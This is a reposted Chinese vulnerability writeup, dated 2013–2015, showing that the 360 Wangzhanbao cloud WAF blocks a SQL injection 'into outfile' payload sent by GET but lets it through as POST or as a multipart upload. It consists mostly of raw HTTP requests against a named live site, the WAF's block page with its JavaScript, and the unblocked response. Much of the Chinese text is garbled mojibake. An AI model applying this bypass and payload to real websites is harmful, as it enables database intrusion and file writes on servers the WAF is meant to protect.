来源:自学PHP网 时间:2015-04-16 23:14 作者: 阅读:次
[导读] 360网站宝等云waf产品在实现的时候存在问题可以导致安全策略绕过在对GET请求处理的时候都能够识别攻击,但是一旦换成了POST请求或者是改造过的POST就不存在此问题了GET index php?id=1%2...
|
360网站宝等云waf产品在实现的时候存在问题可以导致安全策略绕过
在对GET请求处理的时候都能够识别攻击,但是一旦换成了POST请求或者是改造过的POST就不存在此问题了
GET /index.php?id=1%20into%20outfile%20'/tmp/abc' HTTP/1.1
Host: www.xiangshu.com
Connection: keep-alive
Content-Length: 1778
HTTP/1.1 493
Server: nginx/1.2.9
Date: Thu, 28 Nov 2013 12:21:35 GMT
Content-Type: text/html
Content-Length: 5538
Connection: keep-alive
X-Powered-By-360WZB: wangzhan.360.cn
<!DOCTYPE html>
<html>
<head>
<title>ç¦æ¢è®¿é—®</title>
<meta charset="utf-8" />
<meta name="author" content="" />
<meta name="keywords" content="" />
<meta name="description" content="" />
<style>
body{margin:0; padding:0;text-align: center;font-family:"微软雅黑" Arial, Helvetica, sans-serif;font-size: 14px;color: #666;}
div,dl,dd,dt,ul,li,p,h1,h2{margin:0; padding:0;}
h1{font-size:22px; line-height:30px; text-align:left; line-height:40px; margin-bottom:10px; color:#666;}
.wrap{width:715px; margin:50px auto;}
.waring-tips1,.waring-tips2{height:55px; line-height:55px; border-radius:10px; font-size:20px; color:#fff; }
.waring-tips1{background:#F8AE01 url(/wzws-waf-cgi/wz-warning-logo.png) no-repeat 580px center;}
.waring-tips2{background:#0D5598 url(/wzws-waf-cgi/wz-warning-logo.png) no-repeat 580px center;}
.waring-tips1 p,.waring-tips2 p{padding-left:50px; line-height:55px; background:url(/wzws-waf-cgi/wz-warning-icon2.png) no-repeat 15px center;}
.main{border:1px solid #D0D0D0; border-radius:10px;}
.warning-domain{padding:10px 20px;}
.warning-domain dt{color:#000; text-align:left;font-size:20px; font-weight:bold; line-height:30px;}
.warning-domain dd{color:#333; text-align:left; font-size:16px; line-height:35px;}
.warning-conlist{border-top:1px solid #d0d0d0; padding-top:10px; padding-bottom:10px;}
.warning-conlist dl{position:relative;}
.warning-conlist dl dt{width:190px; position:absolute; text-align:center;font-size:16px; font-weight:bold; color:#555; left:0; top:0; line-height:45px; text-align:left; text-indent:50px;}
.warning-conlist dl dd{margin-left:190px; line-height:45px; text-align:left;}
.warning-conlist p{clear:both; font-size:12px; text-align:left; line-height:30px; padding:5px 10px;}
</style>
</head>
<body>
<div class="wrap">
<h1 class="waring-tips1"><p>ç¦æ¢è®¿é—®</p></h1>
<div class="main">
<dl class="warning-domain">
<dt id="host"></dt>
<dd>您æ交的请求å˜åœ¨å±é™©å†…容,已被网站å«å£«æ‹¦æˆªï¼</dd>
</dl>
<div class="warning-conlist">
<dl>
<dt>拦截网å€ï¼š</dt>
<dd id="wurl"> </dd>
</dl>
<dl>
<dt>拦截时间:</dt>
<dd id="wdate">2013-03-28 16:19:25</dd>
</dl>
<dl style="margin-bottom:10px; border-bottom:1px solid #ccc">
<dt>处ç†ç»“果:</dt>
<dd>IP已被记录并æ交至网络监察部门备案ï¼</dd>
</dl>
<p>如果您是站长,è¦ç»§ç»è®¿é—®ç½‘å€,请进入<a href="javascript:void(0);" onclick="tongdao()" style="color:green">[站长绿色通é“]</a></p>
<p >(站长绿色通é“:网站å«å£«ä¼šè‡ªåŠ¨å°†å½“å‰è¢«æ‹¦æˆªçš„URLåŠ å…¥é˜²ç«å¢™ç™½åå•ï¼Œåœ¨3å°æ—¶ä¹‹å†…该URLä¸è¿›è¡Œå®‰å…¨æ£€æµ‹)</p>
</div>
</div>
</div>
<script type="text/javascript" src="/wzws-waf-cgi/jquery-1.4.2.min.js"></script>
<script type="text/javascript">
function Base64() {
// private property
_keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
// public method for encoding
this.encode = function (input) {
var output = "";
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
var i = 0;
input = _utf8_encode(input);
while (i < input.length) {
chr1 = input.charCodeAt(i++);
chr2 = input.charCodeAt(i++);
chr3 = input.charCodeAt(i++);
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if (isNaN(chr2)) {
enc3 = enc4 = 64;
} else if (isNaN(chr3)) {
enc4 = 64;
}
output = output +
_keyStr.charAt(enc1) + _keyStr.charAt(enc2) +
_keyStr.charAt(enc3) + _keyStr.charAt(enc4);
}
return output;
}
// private method for UTF-8 encoding
_utf8_encode = function (string) {
string = string.replace(/\r\n/g,"\n");
var utftext = "";
for (var n = 0; n < string.length; n++) {
var c = string.charCodeAt(n);
if (c < 128) {
utftext += String.fromCharCode(c);
} else if((c > 127) && (c < 2048)) {
utftext += String.fromCharCode((c >> 6) | 192);
utftext += String.fromCharCode((c & 63) | 128);
} else {
utftext += String.fromCharCode((c >> 12) | 224);
utftext += String.fromCharCode(((c >> 6) & 63) | 128);
utftext += String.fromCharCode((c & 63) | 128);
}
}
return utftext;
}
}
function HTMLEncode(html)
{
var temp = document.createElement ("div");
(temp.textContent != null) ? (temp.textContent = html) : (temp.innerText = html);
var output = temp.innerHTML;
temp = null;
return output;
}
$(document).ready(function(){
$("#host").text(location.hostname);
$("#wurl").text(HTMLEncode(location.href));
var myDate = new Date();
$("#wdate").text(myDate.toLocaleString());
});
function wubao(){
var host = location.hostname;
location.href="fankui.html?"+host;
}
function tongdao(){
var host = location.hostname;
var url = HTMLEncode(location.href);
var index = url.indexOf("?");
if(index>0){
url = url.substr(0,index);
}
var b = new Base64();
url = b.encode(url);
location.href="http://wangzhan.360.cn/index/shouquan/host/"+host+"/?url="+url;
}
</script>
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-32745158-2']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
</body>
</html>
换成
POST /index.php?id=1%20into%20outfile%20'/tmp/abc' HTTP/1.1
Host: www.xiangshu.com
Connection: keep-alive
Content-Length: 1778
HTTP/1.1 493
Server: nginx/1.2.9
Date: Thu, 28 Nov 2013 12:22:04 GMT
Content-Type: text/html
Content-Length: 5538
Connection: keep-alive
X-Powered-By-360WZB: wangzhan.360.cn
<!DOCTYPE html>
<html>
<head>
<title>ç¦æ¢è®¿é—®</title>
<meta charset="utf-8" />
<meta name="author" content="" />
<meta name="keywords" content="" />
<meta name="description" content="" />
<style>
body{margin:0; padding:0;text-align: center;font-family:"微软雅黑" Arial, Helvetica, sans-serif;font-size: 14px;color: #666;}
div,dl,dd,dt,ul,li,p,h1,h2{margin:0; padding:0;}
h1{font-size:22px; line-height:30px; text-align:left; line-height:40px; margin-bottom:10px; color:#666;}
.wrap{width:715px; margin:50px auto;}
.waring-tips1,.waring-tips2{height:55px; line-height:55px; border-radius:10px; font-size:20px; color:#fff; }
.waring-tips1{background:#F8AE01 url(/wzws-waf-cgi/wz-warning-logo.png) no-repeat 580px center;}
.waring-tips2{background:#0D5598 url(/wzws-waf-cgi/wz-warning-logo.png) no-repeat 580px center;}
.waring-tips1 p,.waring-tips2 p{padding-left:50px; line-height:55px; background:url(/wzws-waf-cgi/wz-warning-icon2.png) no-repeat 15px center;}
.main{border:1px solid #D0D0D0; border-radius:10px;}
.warning-domain{padding:10px 20px;}
.warning-domain dt{color:#000; text-align:left;font-size:20px; font-weight:bold; line-height:30px;}
.warning-domain dd{color:#333; text-align:left; font-size:16px; line-height:35px;}
.warning-conlist{border-top:1px solid #d0d0d0; padding-top:10px; padding-bottom:10px;}
.warning-conlist dl{position:relative;}
.warning-conlist dl dt{width:190px; position:absolute; text-align:center;font-size:16px; font-weight:bold; color:#555; left:0; top:0; line-height:45px; text-align:left; text-indent:50px;}
.warning-conlist dl dd{margin-left:190px; line-height:45px; text-align:left;}
.warning-conlist p{clear:both; font-size:12px; text-align:left; line-height:30px; padding:5px 10px;}
</style>
</head>
<body>
<div class="wrap">
<h1 class="waring-tips1"><p>ç¦æ¢è®¿é—®</p></h1>
<div class="main">
<dl class="warning-domain">
<dt id="host"></dt>
<dd>您æ交的请求å˜åœ¨å±é™©å†…容,已被网站å«å£«æ‹¦æˆªï¼</dd>
</dl>
<div class="warning-conlist">
<dl>
<dt>拦截网å€ï¼š</dt>
<dd id="wurl"> </dd>
</dl>
<dl>
<dt>拦截时间:</dt>
<dd id="wdate">2013-03-28 16:19:25</dd>
</dl>
<dl style="margin-bottom:10px; border-bottom:1px solid #ccc">
<dt>处ç†ç»“果:</dt>
<dd>IP已被记录并æ交至网络监察部门备案ï¼</dd>
</dl>
<p>如果您是站长,è¦ç»§ç»è®¿é—®ç½‘å€,请进入<a href="javascript:void(0);" onclick="tongdao()" style="color:green">[站长绿色通é“]</a></p>
<p >(站长绿色通é“:网站å«å£«ä¼šè‡ªåŠ¨å°†å½“å‰è¢«æ‹¦æˆªçš„URLåŠ å…¥é˜²ç«å¢™ç™½åå•ï¼Œåœ¨3å°æ—¶ä¹‹å†…该URLä¸è¿›è¡Œå®‰å…¨æ£€æµ‹)</p>
</div>
</div>
</div>
<script type="text/javascript" src="/wzws-waf-cgi/jquery-1.4.2.min.js"></script>
<script type="text/javascript">
function Base64() {
// private property
_keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
// public method for encoding
this.encode = function (input) {
var output = "";
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
var i = 0;
input = _utf8_encode(input);
while (i < input.length) {
chr1 = input.charCodeAt(i++);
chr2 = input.charCodeAt(i++);
chr3 = input.charCodeAt(i++);
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if (isNaN(chr2)) {
enc3 = enc4 = 64;
} else if (isNaN(chr3)) {
enc4 = 64;
}
output = output +
_keyStr.charAt(enc1) + _keyStr.charAt(enc2) +
_keyStr.charAt(enc3) + _keyStr.charAt(enc4);
}
return output;
}
// private method for UTF-8 encoding
_utf8_encode = function (string) {
string = string.replace(/\r\n/g,"\n");
var utftext = "";
for (var n = 0; n < string.length; n++) {
var c = string.charCodeAt(n);
if (c < 128) {
utftext += String.fromCharCode(c);
} else if((c > 127) && (c < 2048)) {
utftext += String.fromCharCode((c >> 6) | 192);
utftext += String.fromCharCode((c & 63) | 128);
} else {
utftext += String.fromCharCode((c >> 12) | 224);
utftext += String.fromCharCode(((c >> 6) & 63) | 128);
utftext += String.fromCharCode((c & 63) | 128);
}
}
return utftext;
}
}
function HTMLEncode(html)
{
var temp = document.createElement ("div");
(temp.textContent != null) ? (temp.textContent = html) : (temp.innerText = html);
var output = temp.innerHTML;
temp = null;
return output;
}
$(document).ready(function(){
$("#host").text(location.hostname);
$("#wurl").text(HTMLEncode(location.href));
var myDate = new Date();
$("#wdate").text(myDate.toLocaleString());
});
function wubao(){
var host = location.hostname;
location.href="fankui.html?"+host;
}
function tongdao(){
var host = location.hostname;
var url = HTMLEncode(location.href);
var index = url.indexOf("?");
if(index>0){
url = url.substr(0,index);
}
var b = new Base64();
url = b.encode(url);
location.href="http://wangzhan.360.cn/index/shouquan/host/"+host+"/?url="+url;
}
</script>
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-32745158-2']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
</body>
</html>
即不拦
如果还拦就换成文件上传的方式
------------gL6ei4ae0GI3Ij5Ij5cH2ei4KM7KM7 Content-Disposition: form-data; name="folder" /blog/ ------------gL6ei4ae0GI3Ij5Ij5cH2ei4KM7KM7 Content-Disposition: form-data; name="id" 1%20into%20outfile%20'/tmp/abc' HTTP/1.1 200 OK Server: nginx/1.2.9 Date: Thu, 28 Nov 2013 12:22:23 GMT Content-Type: text/html Connection: keep-alive X-Powered-By-360WZB: wangzhan.360.cn X-Powered-By: PHP/5.2.13 Content-Length: 6258 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="stylesheet" type="text/css" href="/css/main.css" /> <script type="text/javascript" src="/assets/b043222/jquery.js"></script> <script type="text/javascript" src="/css/cycle.js"></script> <title>æ©¡æ ‘æ‘„å½±ç½‘-ä¸å›½æ©¡æ ‘摄影爱好者俱ä¹éƒ¨ www.xiangshu.com</title> <meta name="Description" content="æ©¡æ ‘æ‘„å½±ç½‘ www.xiangshu.com ä¸å›½è§„模最大的摄影俱ä¹éƒ¨" /> <link rel="shortcut icon" href="http://www.xiangshu.com/images/xiangshu.ico" /> </head> <body> <div id="wrap"> <div id="header"> <div id="logo"> <div id="logopic"><a href=http://www.xiangshu.com/club/0><img src=http://www.2cto.com/uploadfile/2014/0113/20140113105359402.jpg border=0></a></div> <h1>ä¸å›½è§„模最大的摄影俱ä¹éƒ¨</h1> </div> <div id="club"><a href="/club/0">总站</a> <a style="font-size:12px;font-weight:normal;color:red" href="/site/club"> [æ¢åŸŽå¸‚]</a> </div> <div id="banner"> <div id="enter"> <a href=http://www.xiangshu.com/read.php?tid=1004568>网站çƒçº¿ç”µè¯:400-100-8885</a> | <a href=http://www.gxsyxy.com target="_blank">光线摄影å¦é™¢</a> | <a href=http://www.xiangshu.com/club/0>总站首页入å£</a> </div> <div class="clear"></div> <div id="subnav"> <ul> <li style="background:#006600"><a href=http://www.xiangshu.com/joining.php>注册å…费会员</a></li> <li style="background:#99CC00"><a href=http://www.xiangshu.com/read.php?tid=1004568>申请VIP会员</a> </li> <li style="background:#FF9900"><a href=http://www.xiangshu.com/membercard.php>æ†ç»‘会员å¡</a></li> <li style="background:#666666"><a href=http://www.xiangshu.com/about/7>景点åˆä½œå’Œæ¡ˆä¾‹</a> </li> </ul> </div> </div> </div> <div id="nav"> <div id="nav_l"></div> <div id="nav_bg"> <ul> <li><a href=http://www.xiangshu.com/pic/1>人 æ–‡</a></li> <li>|</li> <li><a href=http://www.xiangshu.com/pic/2>风 å…‰</a></li> <li>|</li> <li><a href=http://www.xiangshu.com/pic/3>美 女</a></li> <li>|</li> <li><a href=http://www.xiangshu.com/pic/4>创 æ„</a></li> <li>|</li> <li><a href=http://www.xiangshu.com/thread.php?fid=2>摄影社区</a></li> <li>|</li> <li><a href=http://www.xiangshu.com/thread.php?fid=64>é©´å‹ä¸“区</a></li> <li class="btn"><a href=http://www.xiangshu.com/site/club>æ›´æ¢åŸŽå¸‚分站</a></li> </ul> </div> <div id="nav_r"></div> </div> <div id="main"> <div id="index_top"></div> <div id="index_bg"> <div id="flash"> <a href="http://www.xiangshu.com/thread.php?fid=2"><img width="538" height="404" src=http://www.2cto.com/uploadfile/2014/0113/20140113105359874.jpg" alt="进入其他城市å¯çœ‹æ›´å¤šå½“地精åŽå›¾ç‰‡" /></a> <a href="http://www.xiangshu.com/thread.php?fid=2"><img width="538" height="404" src=http://www.2cto.com/uploadfile/2014/0113/20140113105359659.jpg" alt="进入其他城市å¯çœ‹æ›´å¤šå½“地精åŽå›¾ç‰‡" /></a> </div> <div id="map"> <div id="iframe"><iframe marginWidth="0" marginHeight="0" frameSpacing="0" src="http://www.xiangshu.com/map/" frameBorder="0" width="300" scrolling="no" height="242"></iframe></div> <div id="news"> <div id="news_tit"><span class="left">总站公告</span><span class="right">从地图进俱ä¹éƒ¨ [<a href=club.html>æ–‡å—å…¥å£</a>] </span></div> <div id="news_list"> <ul> <li> <dl> <dt><a target="_blank" href="/article/view/id/62">çƒçƒˆåº†ç¥æ©¡æ ‘摄影网创办9周年[å月二åå…]</a></dt> <dd>[10-20]</dd> </dl> </li> <li> <dl> <dt><a target="_blank" href="/article/view/id/61">æ©¡æ ‘ç½‘ä»£è¡¨åº”é‚€å‡ºå¸ä¸å›½ç¥žå†œæž¶åšå®¢é‚€è¯·èµ›</a></dt> <dd>[06-09]</dd> </dl> </li> <li> <dl> <dt><a target="_blank" href="/article/view/id/60">关于委托å”瑞先生赴景区洽谈åˆä½œçš„声明</a></dt> <dd>[04-19]</dd> </dl> </li> <li> <dl> <dt><a target="_blank" href="/article/view/id/59">网站å‡çº§:图片质é‡ä¸Šå‡åˆ°500K,开放外链</a></dt> <dd>[03-06]</dd> </dl> </li> <li> <dl> <dt><a target="_blank" href="/article/view/id/58">æ©¡æ ‘ç½‘å‰¯æ€»è£å’Œæœ¨çŽ‹å›½å®¶æ£®æž—å…¬å›ç¾çº¦</a></dt> <dd>[12-21]</dd> </dl> </li> </ul> </div> </div> </div> </div> <div id="index_bottom"></div> </div> <div id="hezuo"> <a href=http://www.xiangshu.com/about/6>å…³äºŽæ©¡æ ‘</a> - <a href=http://www.xiangshu.com/about/8>è”系我们</a> - <a href=http://www.xiangshu.com/link>å‹æƒ…链接</a> [粤ICP备11037153å·] </div> </body> </html>
就不拦了......
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
